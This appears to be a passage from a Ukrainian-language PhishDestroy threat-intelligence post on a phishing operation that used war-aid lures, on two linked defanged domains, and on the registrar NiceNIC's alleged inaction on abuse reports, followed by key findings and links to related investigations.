Цей випадок не є поодиноким — він є прикладом систематична недбалість з боку NiceNIC якого ми вирішили навести як приклад «мегахакерів». Як правильно зазначив «Типичний Мошенник»: між хакерами та шахраями є різниця — розвідка. Ці оператори не є ані хакерами, ані розумними людьми.
Системи PhishDestroy автоматично збирають подібні докази на тисячах доменів — відстежуючи ботів, архівуючи листування операторів та створюючи карту інфраструктури. Цей конкретний випадок був просто надто абсурдним, щоб його не опублікувати. Фішинговий набір є стандартним, заходи з оперативної безпеки (OPSEC) відсутні, а оператори в паніці видалили свою групу вже через кілька хвилин після виявлення.
Ми створюємо систему, яка буде відображати підтверджені дані про операторів безпосередньо на сторінках звітів про домени — від шахрая до жертви, як у російському телешоу «Жди Меня», але навпаки. Воно працює в закритому режимі з 2024 року. Багатьох учасників вже ідентифіковано — у тому числі тих, хто видалив свої акаунти. Ми саме визначаємо найбільш цікаво як це представити. Слідкуйте за новинами.
Пов’язані домени
Наш аналіз дозволив виявити другу сферу — hlpforvpeople[.]sbs — зареєстровані через одного й того самого реєстратора з однаковими схемами інфраструктури. Обидва домени зафіксовані в нашій базі даних:
Недотримання вимог реєстратором: NiceNIC International
Компанія «NiceNIC International Group Co., Limited» (Гонконг) отримала чимало докладних повідомлень про зловживання від PhishDestroy щодо обох dopomogvoina[.]sbs та hlpforvpeople[.]sbs. На момент публікації — Через 5 днів після першого повідомлення — жодних заходів вжито не було. Обидва домени продовжують повноцінно функціонувати.
Це не поодинокий випадок. Проблема NiceNIC постійно виникає в ході наших розслідувань. Контактна інформація реєстратора щодо зловживань (abuse@nicenic.net) постійно ігнорує повідомлення про фішинг, що містять численні докази. Незважаючи на те, що NiceNIC є реєстратором, акредитованим ICANN, який зобов’язаний дотримуватися Угоди про акредитацію реєстраторів (RAA, §3.18), компанія діє, як видається, безкарно.
NiceNIC веде діяльність російською мовою, продає .ru домени за підвищеними цінами (близько 200 доларів) та спілкується з клієнтами через «ВКонтакте» і Telegram — платформи, популярні серед російськомовної аудиторії. Те, що їхня клієнтська база перетинається з підпільними спільнотами, викликає серйозні сумніви щодо того, чи є ігнорування реєстратором повідомлень про зловживання недбалістю, чи навмисною бізнес-стратегією.
Це дослідження було опубліковано частково через тривалу бездіяльність компанії NiceNIC. Коли реєстратори відмовляються вживати заходів щодо зловживань, пов’язаних із фішингом, публічне викриття стає єдиним механізмом притягнення до відповідальності, що залишається.
Основні висновки
- Автоматизація — це єдиний спосіб не відставати від часу. Фішингові набори розгортаються та перетворюються на зброю за лічені години. Ручний аналіз не може встигати за такими темпами.
- Оператори припускаються помилок. Файл конфігурації, що залишився відкритим у другорядному проєкті, дозволив викрити цілу міжнародну фішингову операцію. Досконалу оперативну безпеку (OPSEC) важко забезпечити в усіх проєктах.
- Соціальна інженерія розвивається разом із новинами. Теми війни, гуманітарної допомоги та урядових програм дедалі частіше використовуються як приманки для фішингу, оскільки вони націлені на людей, які перебувають у скрутному становищі й менш схильні сумніватися в їхній легітимності.
- Повторне використання інфраструктури є нормою. Один сервер, два фішингові проекти, дві країни, одні й ті самі оператори. Аналіз зв’язків між елементами інфраструктури дає набагато більше інформації, ніж аналіз окремого домену в ізоляції.
Пов’язані дослідження
Нові результати розслідувань, отримані за допомогою автоматизованої Pipeline PhishDestroy
Розкрито інформацію про панель управління TrustWallet
Злом адміністративної панелі викрив міжнародну фішингову операцію, пов’язану з криптовалютою, — у ній були виявлені журнали чатів операторів.
Викрито мережі, що викачують криптовалюту
Аналіз інфраструктури фішингових наборів, спрямованих на викрадення коштів з гаманців користувачів DeFi.
NiceNIC: Реєстратор, що сприяє кіберзлочинності
Як реєстратор, акредитований ICANN, систематично ігнорує повідомлення про зловживання — в тому числі й у рамках цього розслідування.
XMRWallet викрито: 10 років викрадених ключів
Шахрайство з гаманцями Monero, що тривало десятиліття, було викрито завдяки аналізу JavaScript та криміналістичній експертизі доменів.
Викрито інфраструктуру шахрайства
Спільний хостинг, спільні оператори — як фішингові мережі повторно використовують інфраструктуру в різних кампаніях.
«BuyTRX Drainer» — розкриття таємниці
Енергетична афера на базі TRON, яка спустошує гаманці через затвердження шкідливих смарт-контрактів.
Застереження: Це розслідування було проведено виключно за допомогою пасивної розвідки та загальнодоступних API. Не було здійснено жодного несанкціонованого доступу до будь-якої системи. При зверненнях до API-інтерфейсу бота Telegram використовувався токен, який оператори оприлюднили у кінцевій точці, що не вимагає автентифікації. Усі доменні імена в цій статті були змінені відповідно до стандартних правил інформаційної безпеки.